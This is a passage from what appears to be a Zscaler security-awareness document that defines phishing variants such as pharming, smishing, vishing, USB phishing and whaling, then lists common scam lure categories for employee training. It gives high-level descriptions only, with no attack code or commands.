15. Man-in-the-middle (MiTM) phishing: Attackers target users of a specific server or system, capturing data in-transit such as credentials, cookies, or bank account information, by mimicking online services through proxy servers.

16. Pharming or DNS cache phishing: Attackers redirect visitors to a malicious site by altering the IP address of a legitimate website in the compromised domain name system (DNS) servers, or by sending a phishing email with malicious code that redirects the victim to the site when they enter any URL from their computer.

17. QR code phishing: Attackers use QR codes that, when scanned by the victim's smartphone, lead to malicious websites or download malware onto the device.

18. Ransomware phishing: Attackers send emails with malicious attachments or links that, when clicked, download ransomware onto the victim's computer and demand payment in exchange for a recovery decryption key.

19. Reverse tunnel phishing: Attackers use a remote server to create a reverse SSH tunnel to the victim's computer, enabling them to exploit the machine for various purposes, such as malware installation or sensitive data theft, while remaining hidden to avoid detection by the victim.

20. Search engine phishing: Attackers target consumers by creating fake online shopping websites indexed by search engines. They offer large discounts on featured products, and they may appear to be seasonal pop-ups or contain fake backdated reviews. Victims may unknowingly share personal data, bank information, credit card numbers, or even pay for fake goods. Scammers have gone as far as delivering fake shipping and tracking information and even "cheap token goods" to extend the life cycle of these sites.


21. Smishing: Attackers use text messages (SMS communications) to deliver scams, typically with malicious URL links. The message sender appears to be a known brand or the recipient's acquaintance.

22. Spear phishing: Attackers organize campaigns that use publicly available information to target individuals working for specific organizations. These deceptive emails can contain real information and look like legitimate internal requests to trick recipients into performing a desired action.

23. Tailgating: Attackers physically gain entry to a restricted area by following an authorized person with access inside. This attack form is classified as phishing when someone takes the social engineering bait (like carrying several large boxes) presented by the attacker and allows them to enter without verification.

24. USB phishing: Attackers physically plant or send targets USB drive devices loaded with malicious executables that load when plugged into any vulnerable endpoint.

25. Vishing: Attackers make malicious phone calls that use social engineering to pressure recipients into taking an action, like transferring money or revealing personal information.

26. Watering hole phishing: Attackers target members of specific groups likely to visit a specific site that the attacker compromised or created for the purpose of carrying out the attack.

27. Whaling: Attackers target executives and high-profile individuals using publicly available information. They will either socially engineer the target into revealing confidential trade secrets that can be used for fraudulent purposes or trick them into performing another action that the threat actor can use to achieve their goals.


Phishing cannot be eliminated through technology alone. Organizations must track the evolution of phishing scams to observe how shifts in cultural awareness mitigate specific techniques over time. Understanding the different types of scams can help security professionals educate employees on how to apply a skeptical zero trust outlook when encountering what may seem like a legitimate opportunity, verification request, or push notification. When developing your own strategy to reduce phishing incidents, consider including the following types of common scams:

Top Phishing Scam Categories

Cloud scams impersonate file-sharing or cloud storage services with lures such as fake access requests and account notifications.

Consumer scams impersonate e-commerce brands with lures such as fake account notifications and membership or benefits claims.

Commercial scams impersonate general services like FedEx with lures such as tracking notifications and payment requests.

Corporate scams impersonate specific companies with lures such as fake account notifications, company updates, HR tasks, and invoice payment requests.

Dating scams impersonate people seeking to date through an online platform with lures such as fake profiles, messages, likes, and follows.

Financial services scams impersonate known financial institutions targeting individuals with lures such as fake account notifications or security alerts.

Government scams impersonate federal agencies like the IRS with lures such as fake benefits claims, relief loans, and overdue payment requests.

Job offer scams impersonate fake and real companies seeking to hire new employees with lures such as fake job postings, applications, and job offerings.

Push notification or browser scams impersonate web browser notifications with lures such as fake reminders to install updates, message alerts, and product advertisements.

Social media scams impersonate social platforms/users with lures such as fake or spoofed accounts, private messages, account warnings or notifications, and security alerts.

Technical scams impersonate general services or known brands with lures such as account notifications, error messages, and software updates.

© 2023 Zscaler, Inc. All rights reserved. Zscaler™, Zero Trust Exchange™, Zscaler Internet Access™, ZIA™, Zscaler Private Access™, ZPA™ and other trademarks listed at zscaler.com/legal/trademarks are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the properties of their respective owners.

+1 408.533.0288 Zscaler, Inc. (HQ) • 120 Holger Way • San Jose, CA 95134 zscaler.com
